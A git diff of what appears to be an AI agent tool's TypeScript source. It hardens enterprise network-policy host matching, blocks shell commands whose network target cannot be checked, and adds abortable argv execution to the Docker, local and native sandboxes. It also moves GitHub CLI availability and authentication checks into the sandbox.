+		if (typeof command === "string") {
 			urls.push(...extractUrlsFromShellCommand(command));
 		}
+		return urls;
 	}
 
-	return urls;
+	return extractUrlsFromValue(args);
+}
+
+function getOpaqueNetworkCommand(
+	context: ActionApprovalContext,
+): string | null {
+	if (context.toolName !== "bash" && context.toolName !== "background_tasks") {
+		return null;
+	}
+
+	const command = getStringArg(context, "command");
+	return command ? findOpaqueNetworkShellCommand(command) : null;
 }
 
 /**
@@ -70,14 +97,12 @@ export async function checkNetworkRestrictionsDetailed(
 ): Promise<NetworkRestrictionCheck> {
 	try {
 		const parsed = new URL(url);
-		const host = parsed.hostname.toLowerCase();
-
-		const normalizedHost = host.replace(/^\[|\]$/g, "");
+		const host = normalizePolicyHost(parsed.hostname);
+		const normalizedHost = host;
 
 		if (network.blockedHosts?.length) {
 			for (const blockedHost of network.blockedHosts) {
-				const lowerBlocked = blockedHost.toLowerCase();
-				if (host === lowerBlocked || host.endsWith(`.${lowerBlocked}`)) {
+				if (hostMatchesPolicyEntry(host, blockedHost)) {
 					return {
 						allowed: false,
 						reason: `Host "${host}" is blocked by enterprise policy.`,
@@ -100,8 +125,7 @@ export async function checkNetworkRestrictionsDetailed(
 				};
 			}
 			const isAllowed = network.allowedHosts.some((allowedHost) => {
-				const lowerAllowed = allowedHost.toLowerCase();
-				return host === lowerAllowed || host.endsWith(`.${lowerAllowed}`);
+				return hostMatchesPolicyEntry(host, allowedHost);
 			});
 			if (!isAllowed) {
 				return {
@@ -118,7 +142,7 @@ export async function checkNetworkRestrictionsDetailed(
 		const isIP =
 			parseIPv4(normalizedHost) !== null ||
 			parseIPv4MappedHex(normalizedHost) !== null ||
-			normalizedHost.includes(":");
+			netIsIP(normalizedHost) !== 0;
 
 		if (!isIP) {
 			try {
@@ -195,5 +219,14 @@ export async function checkNetworkPolicy(
 			return check;
 		}
 	}
+
+	const opaqueNetworkCommand = getOpaqueNetworkCommand(context);
+	if (opaqueNetworkCommand) {
+		return {
+			allowed: false,
+			reason: `Network-capable command "${opaqueNetworkCommand}" does not expose a statically validatable host for enterprise network policy.`,
+		};
+	}
+
 	return { allowed: true };
 }
diff --git a/src/sandbox/docker-sandbox.ts b/src/sandbox/docker-sandbox.ts
index cc89baebe..7f0c7fa46 100644
--- a/src/sandbox/docker-sandbox.ts
+++ b/src/sandbox/docker-sandbox.ts
@@ -53,15 +53,39 @@
  * @module sandbox/docker-sandbox
  */
 
-import { exec } from "node:child_process";
+import { exec, spawn } from "node:child_process";
 import { randomUUID } from "node:crypto";
 import { promisify } from "node:util";
 import { createLogger } from "../utils/logger.js";
-import type { ExecResult, Sandbox } from "./types.js";
+import {
+	appendCapturedOutput,
+	createOutputCapture,
+	finalizeCapturedOutput,
+} from "./output-capture.js";
+import type { ExecResult, ExecWithArgsOptions, Sandbox } from "./types.js";
 
 const logger = createLogger("sandbox:docker");
 
 const execAsync = promisify(exec);
+const EXEC_WITH_ARGS_MAX_BUFFER = 1024 * 1024;
+const DOCKER_ABORTABLE_EXEC_WRAPPER = `
+child_pid=""
+on_signal() {
+	if [ -n "$child_pid" ]; then
+		kill -TERM -- "-$child_pid" 2>/dev/null || kill -TERM "$child_pid" 2>/dev/null || true
+		wait "$child_pid" 2>/dev/null || true
+	fi
+	exit 143
+}
+trap on_signal TERM INT HUP
+if command -v setsid >/dev/null 2>&1; then
+	setsid "$@" &
+else
+	"$@" &
+fi
+child_pid=$!
+wait "$child_pid"
+`.trim();
 
 export interface DockerSandboxConfig {
 	image?: string;
@@ -107,6 +131,7 @@ export class DockerSandbox implements Sandbox {
 		command: string,
 		cwd?: string,
 		env?: Record<string, string>,
+		signal?: AbortSignal,
 	): Promise<ExecResult> {
 		const id = await this.ensureContainer();
 
@@ -122,7 +147,7 @@ export class DockerSandbox implements Sandbox {
 		dockerCmd += ` ${id} sh -c "${command.replace(/"/g, '\\"')}"`;
 
 		try {
-			const { stdout, stderr } = await execAsync(dockerCmd);
+			const { stdout, stderr } = await execAsync(dockerCmd, { signal });
 			return { stdout, stderr, exitCode: 0 };
 		} catch (error: unknown) {
 			const execError = error as {
@@ -138,6 +163,83 @@ export class DockerSandbox implements Sandbox {
 		}
 	}
 
+	async execWithArgs(
+		command: string,
+		args: string[] = [],
+		options: ExecWithArgsOptions = {},
+	): Promise<ExecResult> {
+		try {
+			const id = await this.ensureContainer();
+			const dockerArgs = ["exec"];
+			if (options.cwd) {
+				dockerArgs.push("-w", options.cwd);
+			}
+			if (options.env) {
+				for (const [key, value] of Object.entries(options.env)) {
+					dockerArgs.push("-e", `${key}=${value}`);
+				}
+			}
+			if (options.signal) {
+				dockerArgs.push(
+					id,
+					"sh",
+					"-lc",
+					DOCKER_ABORTABLE_EXEC_WRAPPER,
+					"sh",
+					command,
+					...args,
+				);
+			} else {
+				dockerArgs.push(id, command, ...args);
+			}
+
+			return await new Promise<ExecResult>((resolve, reject) => {
+				const child = spawn("docker", dockerArgs, {
+					signal: options.signal,
+					stdio: ["ignore", "pipe", "pipe"],
+				});
+				const maxBuffer = options.maxBuffer ?? EXEC_WITH_ARGS_MAX_BUFFER;
+				const stdoutCapture = createOutputCapture();
+				const stderrCapture = createOutputCapture();
+
+				child.stdout?.on("data", (data: Buffer) => {
+					appendCapturedOutput(stdoutCapture, data, maxBuffer);
+				});
+				child.stderr?.on("data", (data: Buffer) => {
+					appendCapturedOutput(stderrCapture, data, maxBuffer);
+				});
+				child.on("close", (code) => {
+					resolve({
+						stdout: finalizeCapturedOutput(stdoutCapture),
+						stderr: finalizeCapturedOutput(stderrCapture),
+						exitCode: code ?? 1,
+					});
+				});
+				child.on("error", (error) => {
+					const execError = error as Error & {
+						stdout?: string;
+						stderr?: string;
+					};
+					execError.stdout = finalizeCapturedOutput(stdoutCapture);
+					execError.stderr = finalizeCapturedOutput(stderrCapture);
+					reject(execError);
+				});
+			});
+		} catch (error: unknown) {
+			const execError = error as {
+				stdout?: string;
+				stderr?: string;
+				code?: number | string;
+				message?: string;
+			};
+			return {
+				stdout: execError.stdout || "",
+				stderr: execError.stderr || execError.message || "",
+				exitCode: typeof execError.code === "number" ? execError.code : 1,
+			};
+		}
+	}
+
 	async readFile(path: string): Promise<string> {
 		const result = await this.exec(`cat "${path}"`);
 		if (result.exitCode !== 0) {
diff --git a/src/sandbox/local-sandbox.ts b/src/sandbox/local-sandbox.ts
index eeffb4844..e588f83c7 100644
--- a/src/sandbox/local-sandbox.ts
+++ b/src/sandbox/local-sandbox.ts
@@ -30,20 +30,27 @@
  * @module sandbox/local-sandbox
  */
 
-import { exec } from "node:child_process";
+import { exec, spawn } from "node:child_process";
 import { constants } from "node:fs";
 import { access, readFile, writeFile } from "node:fs/promises";
 import { promisify } from "node:util";
 import { resolveShellEnvironment } from "../utils/shell-env.js";
-import type { ExecResult, Sandbox } from "./types.js";
+import {
+	appendCapturedOutput,
+	createOutputCapture,
+	finalizeCapturedOutput,
+} from "./output-capture.js";
+import type { ExecResult, ExecWithArgsOptions, Sandbox } from "./types.js";
 
 const execAsync = promisify(exec);
+const EXEC_WITH_ARGS_MAX_BUFFER = 1024 * 1024;
 
 export class LocalSandbox implements Sandbox {
 	async exec(
 		command: string,
 		cwd?: string,
 		env?: Record<string, string>,
+		signal?: AbortSignal,
 	): Promise<ExecResult> {
 		try {
 			const { stdout, stderr } = await execAsync(command, {
@@ -51,6 +58,7 @@ export class LocalSandbox implements Sandbox {
 				env: resolveShellEnvironment(env, {
 					workspaceDir: process.cwd(),
 				}),
+				signal,
 			});
 			return {
 				stdout,
@@ -71,6 +79,86 @@ export class LocalSandbox implements Sandbox {
 		}
 	}
 
+	async execWithArgs(
+		command: string,
+		args: string[] = [],
+		options: ExecWithArgsOptions = {},
+	): Promise<ExecResult> {
+		try {
+			const maxBuffer = options.maxBuffer ?? EXEC_WITH_ARGS_MAX_BUFFER;
+			return await new Promise<ExecResult>((resolve, reject) => {
+				const child = spawn(command, args, {
+					cwd: options.cwd,
+					detached: true,
+					env: resolveShellEnvironment(options.env, {
+						workspaceDir: process.cwd(),
+					}),
+					stdio: ["ignore", "pipe", "pipe"],
+				});
+				const stdoutCapture = createOutputCapture();
+				const stderrCapture = createOutputCapture();
+				const killChildTree = (): void => {
+					if (child.pid !== undefined) {
+						try {
+							process.kill(-child.pid, "SIGTERM");
+							return;
+						} catch {
+							// Fall back for platforms without process groups.
+						}
+					}
+					child.kill("SIGTERM");
+				};
+				const cleanupAbort = (): void => {
+					options.signal?.removeEventListener("abort", killChildTree);
+				};
+				options.signal?.addEventListener("abort", killChildTree, {
+					once: true,
+				});
+				if (options.signal?.aborted) {
+					killChildTree();
+				}
+
+				child.stdout?.on("data", (data) => {
+					appendCapturedOutput(stdoutCapture, Buffer.from(data), maxBuffer);
+				});
+				child.stderr?.on("data", (data) => {
+					appendCapturedOutput(stderrCapture, Buffer.from(data), maxBuffer);
+				});
+				child.on("close", (code) => {
+					cleanupAbort();
+					resolve({
+						stdout: finalizeCapturedOutput(stdoutCapture),
+						stderr: finalizeCapturedOutput(stderrCapture),
+						exitCode: code ?? 1,
+					});
+				});
+				child.on("error", (error) => {
+					cleanupAbort();
+					const execError = error as Error & {
+						stdout?: string;
+						stderr?: string;
+					};
+					execError.stdout = finalizeCapturedOutput(stdoutCapture);
+					execError.stderr =
+						finalizeCapturedOutput(stderrCapture) || execError.message;
+					reject(execError);
+				});
+			});
+		} catch (error: unknown) {
+			const execError = error as {
+				stdout?: string;
+				stderr?: string;
+				message?: string;
+				code?: number | string;
+			};
+			return {
+				stdout: execError.stdout || "",
+				stderr: execError.stderr || execError.message || "",
+				exitCode: typeof execError.code === "number" ? execError.code : 1,
+			};
+		}
+	}
+
 	async readFile(path: string): Promise<string> {
 		return readFile(path, "utf-8");
 	}
diff --git a/src/sandbox/native-sandbox.ts b/src/sandbox/native-sandbox.ts
index c07cadc42..73aa2db3a 100644
--- a/src/sandbox/native-sandbox.ts
+++ b/src/sandbox/native-sandbox.ts
@@ -31,9 +31,15 @@ import { fileURLToPath } from "node:url";
 import { promisify } from "node:util";
 import { isPathWithin } from "../utils/path-containment.js";
 import { resolveShellEnvironment } from "../utils/shell-env.js";
+import {
+	appendCapturedOutput,
+	createOutputCapture,
+	finalizeCapturedOutput,
+} from "./output-capture.js";
 import type { ExecResult, Sandbox } from "./types.js";
 
 const _execAsync = promisify(exec);
+const EXEC_WITH_ARGS_MAX_BUFFER = 1024 * 1024;
 
 // ─────────────────────────────────────────────────────────────
 // Sandbox Policy Types
@@ -563,6 +569,7 @@ export class NativeSandbox implements Sandbox {
 		command: string,
 		cwd?: string,
 		env?: Record<string, string>,
+		signal?: AbortSignal,
 	): Promise<ExecResult> {
 		const workingDir = this.resolveWorkingDir(cwd);
 		this.assertExecutionCwd(workingDir);
@@ -587,6 +594,7 @@ export class NativeSandbox implements Sandbox {
 				child = spawn(SEATBELT_EXECUTABLE, seatbeltArgs, {
 					cwd: workingDir,
 					env: mergedEnv,
+					signal,
 				});
 			} else if (platform() === "linux") {
 				reject(new Error(LINUX_NATIVE_UNIMPLEMENTED_MESSAGE));
@@ -618,7 +626,7 @@ export class NativeSandbox implements Sandbox {
 				resolve({
 					stdout,
 					stderr,
-					exitCode: code ?? 0,
+					exitCode: code ?? 1,
 				});
 			});
 
@@ -635,71 +643,93 @@ export class NativeSandbox implements Sandbox {
 	async execWithArgs(
 		command: string,
 		args: string[] = [],
-		options: SpawnOptions = {},
+		options: SpawnOptions & { maxBuffer?: number } = {},
 	): Promise<ExecResult> {
-		const fullCommand = [command, ...args];
-		const workingDir = this.resolveWorkingDir(options.cwd);
-		this.assertExecutionCwd(workingDir);
-		const mergedOptions: SpawnOptions = {
-			...options,
-			cwd: workingDir,
-			env: {
-				...resolveShellEnvironment(options.env, {
-					workspaceDir: this.cwd,
-				}),
-				[SANDBOX_ENV_VAR]: this.getSandboxType(),
-			},
-		};
-
-		return new Promise((resolve, reject) => {
-			let child: ChildProcess;
-
-			if (platform() === "darwin") {
-				const seatbeltArgs = createSeatbeltArgs(
-					fullCommand,
-					this.policy,
-					this.cwd,
-				);
-				child = spawn(SEATBELT_EXECUTABLE, seatbeltArgs, mergedOptions);
-			} else if (platform() === "linux") {
-				reject(new Error(LINUX_NATIVE_UNIMPLEMENTED_MESSAGE));
-				return;
-			} else {
-				reject(
-					new Error(
-						`Native sandbox is not supported on platform ${platform()}. Refusing to run unsandboxed.`,
-					),
-				);
-				return;
-			}
+		try {
+			const { maxBuffer = EXEC_WITH_ARGS_MAX_BUFFER, ...spawnOptions } =
+				options;
+			const fullCommand = [command, ...args];
+			const workingDir = this.resolveWorkingDir(spawnOptions.cwd);
+			this.assertExecutionCwd(workingDir);
+			const mergedOptions: SpawnOptions = {
+				...spawnOptions,
+				cwd: workingDir,
+				env: {
+					...resolveShellEnvironment(spawnOptions.env, {
+						workspaceDir: this.cwd,
+					}),
+					[SANDBOX_ENV_VAR]: this.getSandboxType(),
+				},
+			};
+
+			return await new Promise<ExecResult>((resolve, reject) => {
+				let child: ChildProcess;
+
+				if (platform() === "darwin") {
+					const seatbeltArgs = createSeatbeltArgs(
+						fullCommand,
+						this.policy,
+						this.cwd,
+					);
+					child = spawn(SEATBELT_EXECUTABLE, seatbeltArgs, mergedOptions);
+				} else if (platform() === "linux") {
+					reject(new Error(LINUX_NATIVE_UNIMPLEMENTED_MESSAGE));
+					return;
+				} else {
+					reject(
+						new Error(
+							`Native sandbox is not supported on platform ${platform()}. Refusing to run unsandboxed.`,
+						),
+					);
+					return;
+				}
 
-			this.activeProcesses.add(child);
+				this.activeProcesses.add(child);
 
-			let stdout = "";
-			let stderr = "";
+				const stdoutCapture = createOutputCapture();
+				const stderrCapture = createOutputCapture();
 
-			child.stdout?.on("data", (data: Buffer) => {
-				stdout += data.toString();
-			});
+				child.stdout?.on("data", (data: Buffer) => {
+					appendCapturedOutput(stdoutCapture, data, maxBuffer);
+				});
 
-			child.stderr?.on("data", (data: Buffer) => {
-				stderr += data.toString();
-			});
+				child.stderr?.on("data", (data: Buffer) => {
+					appendCapturedOutput(stderrCapture, data, maxBuffer);
+				});
 
-			child.on("close", (code) => {
-				this.activeProcesses.delete(child);
-				resolve({
-					stdout,
-					stderr,
-					exitCode: code ?? 0,
+				child.on("close", (code) => {
+					this.activeProcesses.delete(child);
+					resolve({
+						stdout: finalizeCapturedOutput(stdoutCapture),
+						stderr: finalizeCapturedOutput(stderrCapture),
+						exitCode: code ?? 1,
+					});
 				});
-			});
 
-			child.on("error", (error) => {
-				this.activeProcesses.delete(child);
-				reject(error);
+				child.on("error", (error) => {
+					this.activeProcesses.delete(child);
+					const execError = error as Error & {
+						stdout?: string;
+						stderr?: string;
+					};
+					execError.stdout = finalizeCapturedOutput(stdoutCapture);
+					execError.stderr = finalizeCapturedOutput(stderrCapture);
+					reject(execError);
+				});
 			});
-		});
+		} catch (error: unknown) {
+			const execError = error as {
+				stdout?: string;
+				stderr?: string;
+				code?: number | string;
+				message?: string;
+			};
+			return {
+				stdout: execError.stdout || "",
+				stderr: execError.stderr || execError.message || "",
+				exitCode: typeof execError.code === "number" ? execError.code : 1,
+			};
+		}
 	}
 
 	/**
diff --git a/src/sandbox/output-capture.ts b/src/sandbox/output-capture.ts
new file mode 100644
index 000000000..ad08728d9
--- /dev/null
+++ b/src/sandbox/output-capture.ts
@@ -0,0 +1,36 @@
+import { StringDecoder } from "node:string_decoder";
+
+type OutputCapture = {
+	text: string;
+	bytes: number;
+	decoder: StringDecoder;
+};
+
+export function createOutputCapture(): OutputCapture {
+	return {
+		text: "",
+		bytes: 0,
+		decoder: new StringDecoder("utf8"),
+	};
+}
+
+export function appendCapturedOutput(
+	capture: OutputCapture,
+	data: Buffer,
+	maxBuffer: number,
+): void {
+	if (capture.bytes >= maxBuffer) {
+		return;
+	}
+
+	const remainingBytes = maxBuffer - capture.bytes;
+	const chunk =
+		data.length <= remainingBytes ? data : data.subarray(0, remainingBytes);
+	capture.text += capture.decoder.write(chunk);
+	capture.bytes += chunk.length;
+}
+
+export function finalizeCapturedOutput(capture: OutputCapture): string {
+	capture.text += capture.decoder.end();
+	return capture.text;
+}
diff --git a/src/sandbox/types.ts b/src/sandbox/types.ts
index d6abdcb65..65b02a807 100644
--- a/src/sandbox/types.ts
+++ b/src/sandbox/types.ts
@@ -4,17 +4,36 @@ export interface ExecResult {
 	exitCode: number;
 }
 
+export interface ExecWithArgsOptions {
+	cwd?: string;
+	env?: Record<string, string>;
+	maxBuffer?: number;
+	signal?: AbortSignal;
+}
+
 export interface Sandbox {
 	/**
 	 * Execute a command in the sandbox.
 	 * @param command The command string to execute
 	 * @param cwd The working directory relative to the sandbox root (or absolute if allowed)
 	 * @param env Environment variables to set
+	 * @param signal AbortSignal used to cancel execution
 	 */
 	exec(
 		command: string,
 		cwd?: string,
 		env?: Record<string, string>,
+		signal?: AbortSignal,
+	): Promise<ExecResult>;
+
+	/**
+	 * Execute a command with argv in the sandbox, when supported.
+	 * This avoids shell interpretation of untrusted arguments.
+	 */
+	execWithArgs?(
+		command: string,
+		args?: string[],
+		options?: ExecWithArgsOptions,
 	): Promise<ExecResult>;
 
 	/**
diff --git a/src/tools/bash.ts b/src/tools/bash.ts
index 8b759c314..61fa5e4fd 100644
--- a/src/tools/bash.ts
+++ b/src/tools/bash.ts
@@ -285,7 +285,7 @@ Timeout: 90s default, 600s max. Output truncates at 40KB.`,
 		// ============================================
 		if (sandbox) {
 			// Execute in isolated sandbox environment (e.g., Docker container)
-			const result = await sandbox.exec(interpolatedCommand, cwd, env);
+			const result = await sandbox.exec(interpolatedCommand, cwd, env, signal);
 
 			// Combine stdout and stderr for output
 			let output = "";
diff --git a/src/tools/gh-helpers.ts b/src/tools/gh-helpers.ts
index b1831b0ef..584845af0 100644
--- a/src/tools/gh-helpers.ts
+++ b/src/tools/gh-helpers.ts
@@ -1,31 +1,92 @@
+import { spawn } from "node:child_process";
+import { StringDecoder } from "node:string_decoder";
 import type { AgentToolResult } from "../agent/types.js";
+import { checkCommand } from "../safety/execpolicy.js";
+import { requirePlanCheck } from "../safety/safe-mode.js";
+import type { Sandbox } from "../sandbox/types.js";
+import { sanitizeWithStaticMask } from "../utils/secret-redactor.js";
+import { resolveShellEnvironment } from "../utils/shell-env.js";
 import { type BashBackgroundDetails, bashTool } from "./bash.js";
+import { killProcessTree } from "./shell-utils.js";
 
-/**
- * Check if GitHub CLI is installed and authenticated.
- * Returns an error result if not available, otherwise returns null.
- */
-export async function checkGhCliAvailable(
-	signal?: AbortSignal,
-): Promise<AgentToolResult<BashBackgroundDetails | undefined> | null> {
-	// Check if gh CLI is installed
-	const checkResult = await bashTool.execute(
-		"gh-check",
-		{ command: "which gh" },
-		signal,
-	);
+const GH_TIMEOUT_MS = 90_000;
+const GH_MAX_BUFFER = 40 * 1024;
+const GH_SANDBOX_MAX_BUFFER = GH_MAX_BUFFER + 1;
 
-	const checkContent = checkResult.content[0];
-	if (
-		checkContent &&
-		"text" in checkContent &&
-		checkContent.text.includes("Command failed")
-	) {
-		return {
-			content: [
-				{
-					type: "text",
-					text: `GitHub CLI (gh) is not installed.
+type OutputCapture = {
+	text: string;
+	bytes: number;
+	truncated: boolean;
+	decoder: StringDecoder;
+};
+
+function createOutputCapture(): OutputCapture {
+	return {
+		text: "",
+		bytes: 0,
+		truncated: false,
+		decoder: new StringDecoder("utf8"),
+	};
+}
+
+function appendCapturedOutput(capture: OutputCapture, data: Buffer): void {
+	if (capture.bytes >= GH_MAX_BUFFER) {
+		capture.truncated = true;
+		return;
+	}
+
+	const remainingBytes = GH_MAX_BUFFER - capture.bytes;
+	if (data.length <= remainingBytes) {
+		capture.text += capture.decoder.write(data);
+		capture.bytes += data.length;
+		return;
+	}
+
+	capture.text += capture.decoder.write(data.subarray(0, remainingBytes));
+	capture.bytes = GH_MAX_BUFFER;
+	capture.truncated = true;
+}
+
+function finalizeCapturedOutput(capture: OutputCapture): string {
+	if (!capture.truncated) {
+		capture.text += capture.decoder.end();
+	}
+	return capture.text;
+}
+
+function quotePolicyArg(value: string): string {
+	if (/^[A-Za-z0-9_./:=@%+,-]+$/u.test(value)) {
+		return value;
+	}
+	return `'${value.replace(/'/g, `'\\''`)}'`;
+}
+
+function buildGhPolicyCommand(args: string[]): string {
+	return ["gh", ...args].map(quotePolicyArg).join(" ");
+}
+
+function isMutatingGhCommand(args: string[]): boolean {
+	const [resource, action] = args;
+	if (resource === "pr") {
+		return action === "create" || action === "checkout" || action === "comment";
+	}
+	if (resource === "issue") {
+		return action === "create" || action === "comment" || action === "close";
+	}
+	if (resource === "repo") {
+		return action === "clone" || action === "fork";
+	}
+	return false;
+}
+
+function ghCliNotInstalledResult(): AgentToolResult<
+	BashBackgroundDetails | undefined
+> {
+	return {
+		content: [
+			{
+				type: "text",
+				text: `GitHub CLI (gh) is not installed.
 
 Install it with:
   macOS:   brew install gh
@@ -33,21 +94,313 @@ Install it with:
   Windows: See https://cli.github.com
 
 After installing, authenticate with: gh auth login`,
-				},
-			],
-			details: undefined,
-		};
+			},
+		],
+		isError: true,
+		details: undefined,
+	};
+}
+
+function sandboxRequiresArgvResult(): AgentToolResult<
+	BashBackgroundDetails | undefined
+> {
+	return {
+		content: [
+			{
+				type: "text",
+				text: "Sandbox gh checks require argv-capable sandbox support.",
+			},
+		],
+		isError: true,
+		details: undefined,
+	};
+}
+function sandboxGhProbeFailureResult(
+	text: string,
+): AgentToolResult<BashBackgroundDetails | undefined> | null {
+	if (
+		!text.includes("Command timed out") &&
+		!text.includes("Command cancelled") &&
+		!text.includes("Daytona session command timed out")
+	) {
+		return null;
 	}
+	return {
+		content: [
+			{
+				type: "text",
+				text: sanitizeWithStaticMask(text).trim(),
+			},
+		],
+		isError: true,
+		details: undefined,
+	};
+}
+
+function sandboxGhProbeLooksLikeMissingGh(text: string): boolean {
+	const normalizedText = text.toLowerCase();
+	return (
+		normalizedText.includes("gh: command not found") ||
+		normalizedText.includes(
+			"gh is not recognized as an internal or external command",
+		) ||
+		normalizedText.includes(
+			"'gh' is not recognized as an internal or external command",
+		) ||
+		normalizedText.includes(
+			'"gh" is not recognized as an internal or external command',
+		) ||
+		normalizedText.includes("spawn gh enoent") ||
+		normalizedText.includes("exec: gh: executable file not found") ||
+		normalizedText.includes('exec: "gh": executable file not found') ||
+		normalizedText.includes("exec: 'gh': executable file not found")
+	);
+}
+
+function sandboxGhAvailabilityFailureResult(
+	text: string,
+): AgentToolResult<BashBackgroundDetails | undefined> {
+	return {
+		content: [
+			{
+				type: "text",
+				text: `GitHub CLI availability check failed.
+
+Original error:
+${sanitizeWithStaticMask(text).trim() || "Unknown sandbox gh probe failure"}`,
+			},
+		],
+		isError: true,
+		details: undefined,
+	};
+}
 
-	// Check if authenticated by running a simple gh command
-	const authCheck = await bashTool.execute(
-		"gh-auth-check",
-		{ command: "gh auth status" },
-		signal,
+function sandboxGhProbeLooksLikeAuthIssue(text: string): boolean {
+	const normalizedText = text.toLowerCase();
+	return (
+		normalizedText.includes("http 401") ||
+		normalizedText.includes("http 403") ||
+		normalizedText.includes("bad credentials") ||
+		normalizedText.includes("authentication failed") ||
+		normalizedText.includes("invalid token") ||
+		normalizedText.includes("token is no longer valid") ||
+		normalizedText.includes("token has expired")
 	);
+}
+
+function sandboxGhAuthenticationFailureResult(
+	text: string,
+): AgentToolResult<BashBackgroundDetails | undefined> {
+	return {
+		content: [
+			{
+				type: "text",
+				text: `GitHub CLI authentication check failed.
+
+Original error:
+${sanitizeWithStaticMask(text).trim() || "Unknown sandbox gh auth probe failure"}`,
+			},
+		],
+		isError: true,
+		details: undefined,
+	};
+}
+
+function combineAbortSignals(signals: AbortSignal[]): {
+	signal: AbortSignal;
+	cleanup: () => void;
+} {
+	const controller = new AbortController();
+	const listeners: Array<{ signal: AbortSignal; listener: () => void }> = [];
+	const abortFrom = (signal: AbortSignal) => {
+		if (!controller.signal.aborted) {
+			controller.abort(signal.reason);
+		}
+	};
+
+	for (const signal of signals) {
+		if (signal.aborted) {
+			abortFrom(signal);
+			break;
+		}
+		const listener = () => abortFrom(signal);
+		listeners.push({ signal, listener });
+		signal.addEventListener("abort", listener, { once: true });
+	}
+
+	return {
+		signal: controller.signal,
+		cleanup: () => {
+			for (const { signal, listener } of listeners) {
+				signal.removeEventListener("abort", listener);
+			}
+		},
+	};
+}
+
+async function runSandboxGhProbe(
+	sandbox: Sandbox,
+	args: string[],
+	env: Record<string, string>,
+	signal?: AbortSignal,
+): Promise<{ isError: boolean; text: string } | null> {
+	if (!sandbox.execWithArgs) {
+		return null;
+	}
+	if (signal?.aborted) {
+		return {
+			isError: true,
+			text: "Command cancelled",
+		};
+	}
+
+	const timeoutController = new AbortController();
+	let timedOut = false;
+	const timeoutHandle = setTimeout(() => {
+		timedOut = true;
+		timeoutController.abort();
+	}, GH_TIMEOUT_MS);
+	const combinedSignal = signal
+		? combineAbortSignals([signal, timeoutController.signal])
+		: { signal: timeoutController.signal, cleanup: () => {} };
+	let abortProbe: (() => void) | undefined;
+
+	try {
+		const probeAbortPromise = new Promise<never>((_, reject) => {
+			abortProbe = () => reject(new Error("Sandbox gh probe aborted"));
+			if (combinedSignal.signal.aborted) {
+				abortProbe();
+				return;
+			}
+			combinedSignal.signal.addEventListener("abort", abortProbe, {
+				once: true,
+			});
+		});
+		const result = await Promise.race([
+			sandbox.execWithArgs("gh", args, {
+				env,
+				maxBuffer: GH_SANDBOX_MAX_BUFFER,
+				signal: combinedSignal.signal,
+			}),
+			probeAbortPromise,
+		]);
+		const messages = [result.stdout, result.stderr].filter(Boolean);
+		if (signal?.aborted) {
+			messages.push("Command cancelled");
+		} else if (timedOut) {
+			messages.push(`Command timed out after ${GH_TIMEOUT_MS / 1000}s`);
+		}
+		return {
+			isError: timedOut || signal?.aborted || result.exitCode !== 0,
+			text: messages.join("\n"),
+		};
+	} catch (error) {
+		if (signal?.aborted) {
+			return {
+				isError: true,
+				text: "Command cancelled",
+			};
+		}
+		if (timedOut) {
+			return {
+				isError: true,
+				text: `Command timed out after ${GH_TIMEOUT_MS / 1000}s`,
+			};
+		}
+		throw error;
+	} finally {
+		clearTimeout(timeoutHandle);
+		if (abortProbe) {
+			combinedSignal.signal.removeEventListener("abort", abortProbe);
+		}
+		combinedSignal.cleanup();
+	}
+}
+
+/**
+ * Check if GitHub CLI is installed and authenticated.
+ * Returns an error result if not available, otherwise returns null.
+ */
+export async function checkGhCliAvailable(
+	signal?: AbortSignal,
+	sandbox?: Sandbox,
+): Promise<AgentToolResult<BashBackgroundDetails | undefined> | null> {
+	const sandboxEnv = sandbox
+		? resolveShellEnvironment(undefined, { workspaceDir: process.cwd() })
+		: undefined;
+
+	if (sandbox) {
+		const checkResult = await runSandboxGhProbe(
+			sandbox,
+			["--version"],
+			sandboxEnv ?? {},
+			signal,
+		);
+		if (!checkResult) {
+			return sandboxRequiresArgvResult();
+		}
+		if (checkResult.isError) {
+			const probeFailure = sandboxGhProbeFailureResult(checkResult.text);
+			if (probeFailure) {
+				return probeFailure;
+			}
+			if (sandboxGhProbeLooksLikeMissingGh(checkResult.text)) {
+				return ghCliNotInstalledResult();
+			}
+			return sandboxGhAvailabilityFailureResult(checkResult.text);
+		}
+	} else {
+		// Check if gh CLI is installed
+		const checkResult = await bashTool.execute(
+			"gh-check",
+			{ command: "which gh" },
+			signal,
+		);
+
+		const checkContent = checkResult.content[0];
+		const checkText =
+			checkContent && "text" in checkContent ? checkContent.text : "";
+		if (
+			checkResult.isError ||
+			checkText.includes("Command failed") ||
+			checkText.includes("Exit code:")
+		) {
+			return ghCliNotInstalledResult();
+		}
+	}
+
+	let authText = "";
+	let sandboxAuthProbeErrored = false;
+	if (sandbox) {
+		const authCheck = await runSandboxGhProbe(
+			sandbox,
+			["auth", "status"],
+			sandboxEnv ?? {},
+			signal,
+		);
+		if (!authCheck) {
+			return sandboxRequiresArgvResult();
+		}
+		sandboxAuthProbeErrored = authCheck.isError;
+		if (sandboxAuthProbeErrored) {
+			const probeFailure = sandboxGhProbeFailureResult(authCheck.text);
+			if (probeFailure) {
+				return probeFailure;
+			}
+		}
+		authText = authCheck.text;
+	} else {
+		// Check if authenticated by running a simple gh command
+		const authCheck = await bashTool.execute(
+			"gh-auth-check",
+			{ command: "gh auth status" },
+			signal,
+		);
+
+		const authContent = authCheck.content[0];
+		authText = authContent && "text" in authContent ? authContent.text : "";
+	}
 
-	const authContent = authCheck.content[0];
-	const authText = authContent && "text" in authContent ? authContent.text : "";
 	if (
 		authText.includes("not logged in") ||
 		authText.includes("gh auth login") ||
@@ -65,10 +418,18 @@ This will open a browser to authenticate with GitHub.
 You can also use a personal access token: gh auth login --with-token`,
 				},
 			],
+			isError: true,
 			details: undefined,
 		};
 	}
 
+	if (sandboxAuthProbeErrored) {
+		if (!sandboxGhProbeLooksLikeAuthIssue(authText)) {
+			return sandboxGhAvailabilityFailureResult(authText);
+		}
+		return sandboxGhAuthenticationFailureResult(authText);
+	}
+
 	return null; // All checks passed
 }
 
@@ -77,10 +438,11 @@ You can also use a personal access token: gh auth login --with-token`,
  */
 export async function executeGhCommand(
 	toolCallId: string,
-	command: string,
+	args: string[],
 	signal?: AbortSignal,
+	sandbox?: Sandbox,
 ): Promise<AgentToolResult<BashBackgroundDetails | undefined>> {
-	const result = await bashTool.execute(toolCallId, { command }, signal);
+	const result = await executeGhArgv(toolCallId, args, signal, sandbox);
 
 	const resultContent = result.content[0];
 	const text =
@@ -100,6 +462,7 @@ Original error:
 ${text}`,
 				},
 			],
+			isError: result.isError,
 			details: undefined,
 		};
 	}
@@ -118,6 +481,7 @@ Original error:
 ${text}`,
 				},
 			],
+			isError: result.isError,
 			details: undefined,
 		};
 	}
